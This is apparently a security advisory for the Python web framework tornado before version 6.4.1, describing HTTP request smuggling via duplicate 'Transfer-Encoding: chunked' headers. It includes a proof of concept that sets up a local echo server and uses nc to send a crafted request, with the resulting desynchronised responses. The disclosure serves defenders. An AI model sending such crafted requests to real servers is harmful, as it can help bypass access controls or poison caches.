HTTP Request Smuggling Affecting tornado package, versions [,6.4.1)

tornado is a Python web framework and asynchronous networking library, originally developed at FriendFeed.

Affected versions of this package are vulnerable to HTTP Request Smuggling due to the handling of multiple Transfer-Encoding: chunked headers. An attacker can desynchronize the connection and potentially bypass ACLs or poison caches by sending crafted requests with duplicate Transfer-Encoding: chunked headers.

Install Tornado

Start a simple Tornado server that echoes each received request's body:

cat << EOF > server.py

import asyncio
import tornado

class MainHandler(tornado.web.RequestHandler):
    def post(self):
        self.write(self.request.body)
async def main():
    tornado.web.Application([(r"/", MainHandler)]).listen(8000)
    await asyncio.Event().wait()
asyncio.run(main())

EOF
python3 server.py &

Send a valid chunked request:

printf 'POST / HTTP/1.1\r\nTransfer-Encoding: chunked\r\n\r\n1\r\nZ\r\n0\r\n\r\n' | nc localhost 8000

Observe that the response is as expected:

HTTP/1.1 200 OK
Server: TornadoServer/6.3.3
Content-Type: text/html; charset=UTF-8
Date: Sat, 07 Oct 2023 17:32:05 GMT
Content-Length: 1

Z

Send a request with two Transfer-Encoding: chunked headers:

printf 'POST / HTTP/1.1\r\nTransfer-Encoding: chunked\r\nTransfer-Encoding: chunked\r\n\r\n1\r\nZ\r\n0\r\n\r\n' | nc localhost 8000

Observe the strange response:

HTTP/1.1 200 OK
Server: TornadoServer/6.3.3
Content-Type: text/html; charset=UTF-8
Date: Sat, 07 Oct 2023 17:35:40 GMT
Content-Length: 0

HTTP/1.1 400 Bad Request

• GitHub Commit